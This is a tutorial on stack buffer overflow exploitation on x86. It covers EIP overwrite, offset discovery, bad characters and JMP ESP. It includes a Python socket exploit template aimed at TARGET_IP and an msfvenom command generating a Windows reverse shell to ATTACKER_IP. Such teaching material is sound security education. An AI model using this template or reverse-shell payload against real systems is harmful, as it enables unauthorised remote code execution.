How the Stack Works
A stack-based buffer overflow works because of how C programs manage memory at runtime. When a function is called, the return address (where execution should go after the function finishes) gets pushed onto the stack alongside the local variables. If a local variable — say, a character buffer — is written to without checking how much data goes in, an attacker can write enough bytes to overflow past the buffer and overwrite the return address. When the function returns, it jumps to the attacker-controlled address instead of the legitimate one.
EIP is the instruction pointer register on x86. It holds the address of the next instruction to execute. On x86, when a function returns, EIP gets loaded from the stack. Controlling what's at that stack location means controlling where execution goes.
Stack Layout (Simplified)
[ Buffer ] → [ Saved EBP ] → [ Return Address (EIP) ] → [ ... ]
Writing past Buffer end overwrites EBP, then EIP. Control EIP, control execution.
The Exploitation Methodology
The process follows predictable steps. First, crash the application with a large input to confirm a vulnerability exists. Then use a cyclic pattern to identify exactly how many bytes it takes to reach EIP — the offset. Then verify EIP control by placing a recognisable value at that offset. Then identify bad characters that would break your shellcode (null bytes, newlines, carriage returns, and whatever the application treats as terminators). Then find a JMP ESP instruction in a module without ASLR or DEP. Then generate shellcode that excludes your bad characters. Finally, build the full payload.
import socket
ip = "TARGET_IP"
port = 9999
offset = 1978
retn = b"\xaf\x11\x50\x62" # JMP ESP address (little-endian)
padding = b"\x90" * 16 # NOP sled
shellcode = b"" # msfvenom output goes here
payload = b"A" * offset + retn + padding + shellcode
with socket.socket() as s:
s.connect((ip, port))
s.send(payload)
Bad Characters and JMP ESP
Bad characters are bytes that the application interprets specially and either strips, modifies, or terminates input on. A null byte (0x00) terminates C strings. A newline (0x0a) or carriage return (0x0d) might terminate a network protocol read. You find them by sending a byte array from 0x01 to 0xff after your offset, then examining memory in the debugger. Any byte that causes the sequence to break or change is a bad character. Remove it, resend, and repeat until the full array lands intact.
The JMP ESP instruction is the classic return address target. After a function returns with your controlled EIP, ESP points to the data immediately after EIP in your payload — which is where your shellcode sits. If you redirect EIP to the address of a JMP ESP instruction in any loaded module, execution jumps to your shellcode. The key is finding a module without ASLR enabled so the address is predictable.
Shellcode Generation
msfvenom -p windows/shell_reverse_tcp \ LHOST=ATTACKER_IP LPORT=4444 \ EXITFUNC=thread \ -b "\x00\x0a\x0d" \ -f python
The -b flag excludes your bad characters. EXITFUNC=thread makes the shellcode exit cleanly rather than crashing the process. The NOP sled before your shellcode gives the encoder some space to work and accounts for minor ESP alignment differences between runs.